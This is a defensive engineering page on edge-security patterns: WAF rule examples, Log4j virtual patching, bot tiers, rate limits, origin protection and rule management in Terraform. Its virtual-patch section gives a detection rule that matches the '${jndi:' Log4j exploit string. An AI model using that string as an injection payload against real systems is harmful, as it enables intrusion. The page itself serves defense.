Steven's Knowledge

Patterns

Layered defense, custom WAF rules, virtual patching, bot management strategies, API-specific protection, observability

Patterns

The patterns that turn off-the-shelf edge security into something tuned to your specific risk surface.

Layered Defense (Defense in Depth)

Don't rely on one layer:

[Client] → [DDoS scrub]    L3/L4 absorption
        → [CDN cache]       Static content offload
        → [WAF (edge)]      Pattern matching
        → [Bot management]  Behavior + fingerprint
        → [Rate limiter]    Per-key throttling
        → [API gateway]     AuthN/AuthZ + per-route limits
        → [App WAF / RASP]  Last-mile filtering
        → [Application]     Secure code
        → [Origin protection] Allow only edge IPs

Each layer has a different failure mode; an attack that defeats one usually doesn't defeat them all. Cloudflare + AWS WAF on the ALB is a common belt-and-suspenders setup for serious workloads.

Custom WAF Rules

Managed rules cover OWASP commons. Custom rules cover your specific needs:

# Cloudflare custom rule examples

Block requests where:
  http.request.uri.path matches "^/api/internal/" AND
  ip.src not in {192.0.2.0/24, 198.51.100.0/24}
Action: Block
Reason: internal endpoints not for public

Allow requests where:
  http.request.uri.path eq "/health" AND
  ip.src in {10.0.0.0/8, 172.16.0.0/12}
Action: Allow (priority high)
Reason: skip rate limit for monitoring

Challenge requests where:
  http.request.method eq "POST" AND
  http.request.uri.path eq "/login" AND
  cf.threat_score gt 30
Action: Managed Challenge

The pattern: managed rules block obvious bad; custom rules express your application's specific access rules and exceptions.

Virtual Patching

A CVE drops for your framework. Patching takes time (test, stage, deploy). WAF can virtually patch within minutes.

Example: Log4j (CVE-2021-44228). The exploit is a string ${jndi:...} in any header. WAF rule:

http.user_agent contains "${jndi:" OR
http.request.body contains "${jndi:" OR
any(http.request.headers[*] contains "${jndi:")
Action: Block

You can deploy this in 15 minutes. The Java patch takes a sprint. Virtual patch buys you the time.

The catch: virtual patches are temporary. They protect known exploitation patterns. Don't skip the real fix; the attacker will eventually craft a payload your virtual patch misses.

API-Specific Protection

Web traffic and API traffic have very different shapes:

WebAPI
Browsers, HTML, JSPrograms, JSON, gRPC
Static cacheableDynamic, mostly authenticated
Bot challenges workBot challenges break clients
Rate limit by IPRate limit by API key
WAF rules for SQLi in URLRules for SQLi in JSON body

API-aware protection:

  • Schema validation: only POST bodies matching the OpenAPI schema are allowed
  • OAuth / API key required: enforce at the edge
  • Per-key rate limits: free tier vs paid tier
  • Method restrictions: only POST/GET on this endpoint, no PUT/DELETE
  • Body content scan: SQLi/XSS patterns in JSON values, not just URLs

Cloudflare API Shield, AWS WAF API protection, Fastly Next-Gen WAF, Salt Security, Noname Security target this segment.

Bot Management Strategy

Not all bots are bad. Build a tiered strategy:

# Allowlist verified search engines (priority 1)
If: user_agent matches "googlebot|bingbot|slackbot" AND verified
Action: Allow

# Allow known monitoring (priority 2)
If: user_agent matches "uptime-robot|datadog-checks" AND ip in {known_ranges}
Action: Allow

# Challenge suspicious (priority 3)
If: client's TLS fingerprint matches "headless-chrome"
Action: Managed Challenge

# Block known bad
If: ip.src in known_bad_ips OR threat_score > 40
Action: Block

# Default
Action: Allow

For high-value endpoints (login, checkout):

  • Always challenge on suspicious signals
  • Lower threshold for friction (Turnstile is brief; legitimate users don't mind)
  • Track outcomes: how often does the bot challenge fire? How often is it solved? If solve rate is low, you're blocking real users

Rate Limiting Strategies

Beyond "X requests per minute":

StrategyWhen
Fixed windowSimple but bursty at window boundaries
Sliding windowSmooth; preferred for user-facing limits
Token bucketBurst-tolerant; good for API users
Leaky bucketSmooth output; good when origin can't burst
Concurrency limitLimit concurrent requests rather than rate
AdaptiveTighten when error rate or latency rises

Per-endpoint tuning:

/login:           5/min/IP, 100/hour/IP, then challenge
/api/search:      100/min/key, 10k/day/key
/api/checkout:    20/min/key, customer-tier-aware
/health:          unlimited
/static/*:        CDN-cached, no rate limit needed

The login endpoint deserves the tightest limits — credential stuffing is the #1 abuse pattern.

Geo-Based Controls

Geo blocking is crude but useful:

  • Block countries you don't serve: if your business is US-only, blocking 90% of the world removes 90% of the attack surface.
  • Lower thresholds for high-risk geos: not block, but more aggressive challenges.
  • Compliance: data sovereignty rules may require geo-routing to specific regions.

Be careful: VPN users in legitimate countries appear from anywhere. Don't block legitimate customers; tier the action by risk level.

Origin Protection (Hidden Origin)

Edge protection is worthless if attackers can hit your origin directly. Methods:

  1. Allowlist Cloudflare IPs in your security group / firewall.
  2. Cloudflare Tunnel / AWS PrivateLink / GCP Private Service Connect: origin has no public IP at all.
  3. Authenticated origin pulls: WAF includes a client cert; origin rejects connections without it.
  4. mTLS: origin requires WAF's cert to talk.

Many a tale of woe: "We have a WAF!" Yes, but dig +short origin.your-app.com resolves to a public IP. Lock it down.

Observability for Edge Security

Edge events are signal-rich. Ingest them:

  • WAF event logs → SIEM (Splunk, Datadog, OpenSearch). Real-time queries.
  • Rate-limit hits → metric (waf_rate_limit_block_total{rule="login"})
  • Bot scores → Grafana dashboard showing legitimate vs. suspicious traffic mix
  • Anomaly alerts: sudden spike in 403s, new IPs, unusual country distribution

Alert on:

  • Sudden rule-block-rate increase (might be attack OR new false positive — investigate)
  • Authenticated user being blocked (likely false positive; fix urgently)
  • Origin traffic from non-WAF IP (origin protection breach)
  • DDoS scrubbing engaged (provider notification)

Connect to your Observability Pipelines to route these.

Modern attackers use the same browser tools as users. Your CDN/WAF must distinguish them without breaking caching:

  • Cache by URL + query string only — not by cookie (else cache hit rate craters)
  • Bot signals influence rules, not cache — bot gets blocked but cache key is the same
  • Separate API routes from cacheable routes/api/* and /cms/* get different policies

Cache miss rate is the secret cost of misconfigured WAFs. A WAF that breaks cache hit ratio costs you in origin load and latency.

Multi-Tenant SaaS Considerations

Different customers, different risk profiles, possibly different regulations:

  • Per-tenant WAF rules: enterprise tenants might have stricter custom rules
  • Per-tenant rate limits: based on contracted tier
  • Tenant isolation: an attack on one tenant shouldn't drown the others
  • Audit logs per tenant: customer's security team can review their own traffic

Cloudflare Enterprise and AWS WAF both support per-resource rules; map your tenants to those.

CI for WAF Rules

WAF rules deserve the same engineering discipline as code:

  • Store rules in Git (Terraform Cloudflare provider, AWS WAF JSON in Git)
  • Code review before changes
  • Test in staging WAF first
  • Audit log of rule changes
  • Tagging of rules (link to ticket / CVE / compliance requirement)
# Terraform Cloudflare provider
resource "cloudflare_ruleset" "waf" {
  zone_id = var.zone_id
  name    = "WAF rules"
  kind    = "zone"
  phase   = "http_request_firewall_custom"

  rules {
    expression = "(http.request.uri.path matches \"^/api/admin\" and not ip.src in $admin_ips)"
    action     = "block"
    description = "Admin API restricted to known IPs (ticket: SEC-1234)"
  }
}

Anti-Patterns

Block-only WAFs. No log mode, no analysis, just block. You'll either over-block or under-block; you won't know which.

Forgotten origin exposure. WAF protects the edge; origin has a public IP. Attacker just hits origin. Lock it down.

Permanent virtual patches. Virtual patch deployed in panic for CVE X; never followed up with the real fix. Eventually the WAF rule is bypassed.

Single point of failure at the WAF. Cloudflare has outages too. Plan: how does your service degrade if the WAF is unavailable? Fail-open (risky) or fail-closed (downtime).

Bot management too aggressive. Legitimate users from VPNs / corporate proxies get challenged constantly. Solve rate matters; tune.

Geo-blocks without exceptions for support. Your customer in country X can't reach you. Build the exception process before you need it.

No alerting on WAF metrics. You miss the slow attack that nibbles for a week. Alert on changes, not just thresholds.

What's Next

  • Best Practices — tuning false positives, attack runbook, common pitfalls, scaling

On this page